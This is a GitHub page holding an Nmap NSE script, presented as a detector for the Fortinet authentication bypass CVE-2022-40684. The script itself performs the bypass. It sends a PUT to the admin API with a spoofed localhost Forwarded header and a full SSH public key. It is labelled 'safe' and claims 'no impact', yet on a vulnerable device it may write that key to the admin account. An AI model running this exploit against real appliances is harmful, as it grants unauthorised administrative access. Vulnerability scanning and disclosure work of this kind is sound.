forked from HAWA771/CVE-2022-40684
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cve-2022-40684.nse
74 lines (62 loc) · 3.41 KB
/
cve-2022-40684.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
local io = require "io"
local json = require "json"
local http = require "http"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
description =
[[
Check Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [Exploit ]
POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
The script sends a specially crafted HTTP request with no impact on the system to detect this vulnerability.
The affected versions are FortiOS versions between 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1FortiProxy versions between 7.0.0 – 7.0.6 and version 7.2.0FortiSwitchManager versions 7.0.0 and 7.2.0
]]
---
-- @usage nmap -sV --script vuln <target>
-- @usage nmap -p80 --script cve_2022_40684.nse <target>
---
author = {"Mr_Hackux", "<[email protected]>", "Valentin Lobstein (Balgogan / Chocapikk)", "<[email protected]>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
portrule = shortport.http
local VULNERABLE = "SSH key is good"
local INVALID_KEY = "SSH key is invalid"
local PATCHED = "Unauthorized"
action = function(host, port)
local uri = "/api/v2/cmdb/system/admin/admin"
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = "Fortinet Critical Authentication Bypass Vulnerability",
state = vulns.STATE.NOT_VULN,
description = [[
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
]],
IDS = {CVE = "CVE-2022-40684"},
references = {
"https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/"
},
dates = {
disclosure = {year = "2022", month = "10", day = "16"}
}
}
local json_key =
'{"ssh-public-key1": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC2EMTW9TNcOrkcPxCrpqdLdp1DnuKfrz4Ba5eHCyONA5yG5R6hvbyPN08/3y4UcIQN8ohcLp4KhiNcHn1Km5w1++bexptZZyOrx+xa1l2jqqZU2MzPtJxzQ17nhWD0QZdXFyZlzNzfSTatR/crH3NR5zq+1PWFvfi99XfGwxvZRukiGYBXaWsvjhoy0/ers58VHhjv1Qi1dYWHcjWA1QfySnrPNKiyD0WwJP10iUkviLilCHw2t/8XTVigluM2hvvgbicx1GSTEYejAqC6b1z5k3U/0K9kZMnqt2rwMiK1bH5r/N/f8x+KZJB3bDl5fMLJ3fm+ikz1h9kTB9fae48Y8GfNv6FKt4TDnawuHQXO2Qb5WDBlBEzgF1MUoSDkTyE4YVKuiLZx5W2oFC/FAzSOjw5l3Jq8y26HDS9SX1dt19vKqmtjJP2n0Vgcy1YCnmjAHlYI+A71nlaq8OTO5YqvuiAAiQdR5rD5fR13yg6Q7Tuw93eyxKmAexFSo6DkKXptpyQHNY4INGpmDQipQTYiWb/5pjJ2FVbn7RSeFkXyun0MfPBUImzGl2ZuuBO39NH86azzK75wyVt05GLH/pfv3A45D056+3e+layxAwYfvds5i8by7db0K3ez9q+6bomz82TJGb1Nnh1UM4yKexoDRrcG5rYkjIKdb0SZpOIIOQ=="}'
local options = {header = {}}
options["header"]["User-Agent"] = "Report Runner"
options["header"]["Forwarded"] = '"for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"'
local response = http.put(host, port, uri, options, json_key)
if response.status and response.body then
if response.status == 500 and string.find(response.body, VULNERABLE) ~= nil then
vuln.state = vulns.STATE.VULN
end
if response.body and string.find(response.body, INVALID_KEY) ~= nil then
vuln.state = vulns.STATE.VULN
end
if response.status ~= 500 and response.body and string.find(response.body, PATCHED) ~= nil then
stdnse.debug2("System is patched!")
vuln.state = vulns.STATE.NOT_VULN
end
end
return vuln_report:make_output(vuln)
end